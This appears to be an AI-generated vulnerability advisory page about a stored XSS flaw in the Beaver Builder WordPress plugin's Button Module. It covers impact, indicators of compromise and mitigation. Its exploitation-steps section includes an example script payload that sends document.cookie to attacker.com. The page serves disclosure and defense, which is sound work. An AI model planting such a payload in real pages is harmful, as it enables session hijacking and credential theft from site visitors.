CVE-2026-17090
WordPress Análise e mitigação de vulnerabilidades

Visão geral

CVE-2026-17090 is a Stored Cross-Site Scripting (XSS) vulnerability in the Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress. It affects all versions up to and including 2.10.2.2, stemming from insufficient input sanitization and output escaping in the Button Module's 'button' (Button Code) setting. The vulnerability was published on August 15, 2026, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, ENISA EUVD).

Detalhes técnicos

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting), specifically in the Button Module's frontend rendering logic within modules/button/includes/frontend.js.php and related files (button.php, class-fl-builder-model.php). Authenticated attackers with Author-level access or above can inject arbitrary JavaScript into the Button Code setting, which is then stored and rendered without proper sanitization whenever a visitor loads the affected page. Beaver Builder's default access model grants editor-level access to any WordPress role holding the edit_posts capability, broadening the pool of potential attackers beyond typical editor roles (Wordfence, WordPress Trac).

Impacto

Successful exploitation allows an authenticated attacker to persistently inject malicious scripts into WordPress pages, which execute in the browsers of any user who visits the compromised page. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further attacks against site visitors and administrators. The changed scope (S:C) in the CVSS vector indicates that the impact extends beyond the plugin itself to affect end users' browsers (Wordfence, ENISA EUVD).

Exploração

As of the publication date, there is no evidence of active in-the-wild exploitation, and no public proof-of-concept exploit code has been identified. The NVD SSVC assessment classifies exploitation as 'none' and the vulnerability as non-automatable, reflecting the requirement for authenticated access. The EPSS score is approximately 0.235%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, ENISA EUVD).

Etapas de exploração

  1. Gain authenticated access: Obtain or register an account on the target WordPress site with at least Author-level privileges (or any role with the edit_posts capability).
  2. Open Beaver Builder editor: Navigate to a page or post using the Beaver Builder page builder interface.
  3. Add or edit a Button Module: Insert a Button Module onto the page and access its settings.
  4. Inject malicious payload: In the 'Button Code' setting field, enter a crafted JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) that bypasses the insufficient sanitization.
  5. Publish or update the page: Save and publish the page, causing the malicious script to be stored in the database.
  6. Trigger execution: Any user (including administrators) who visits the affected page will have the injected script execute in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence, WordPress Trac).

Indicadores de compromisso

  • Logs: WordPress access logs showing POST requests to page/post edit endpoints by Author-level or above accounts, particularly involving Beaver Builder module settings; unexpected script tags in page content stored in the database.
  • File System: Review of wp_posts or wp_postmeta database tables for entries containing <script>, javascript:, or encoded XSS payloads within Beaver Builder button module data.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages containing Beaver Builder Button Modules; unusual cookie or credential exfiltration traffic.
  • Application: Unexpected changes to published page content, particularly in Button Module fields, made by Author-level accounts (Wordfence).

Mitigação e soluções alternativas

Site administrators should update the Beaver Builder Page Builder plugin to a version beyond 2.10.2.2, as the vulnerability affects all versions up to and including that release. The fix was introduced in the changeset available at the WordPress plugin repository. As a temporary workaround, restrict the edit_posts capability to trusted users only, limiting who can access the Beaver Builder editor. Monitoring plugin updates via the WordPress admin dashboard or the official plugin changelog is recommended (Wordfence, WordPress Trac Changeset).

Reações da comunidade

Wordfence included CVE-2026-17090 in its weekly WordPress vulnerability report for August 10–16, 2026, as part of routine disclosure coverage. No notable independent researcher commentary or significant social media discussion has been identified beyond standard vulnerability aggregator coverage (Wordfence Blog).

Recursos adicionais


OrigemEste relatório foi gerado usando IA

Relacionado WordPress Vulnerabilidades:

CVE ID

Gravidade

Pontuação

Tecnologias

Nome do componente

Exploração do CISA KEV

Tem correção

Data de publicação

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NãoSimAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NãoSimAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NãoSimAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NãoSimAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NãoSimAug 23, 2026

Avaliação de vulnerabilidade gratuita

Compare sua postura de segurança na nuvem

Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.

Solicitar avaliação

Marque uma demonstração personalizada

Pronto para ver a Wiz em ação?

"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
David EstlickCISO
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
Adam FletcherDiretor de Segurança
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."
Greg PoniatowskiChefe de Gerenciamento de Ameaças e Vulnerabilidades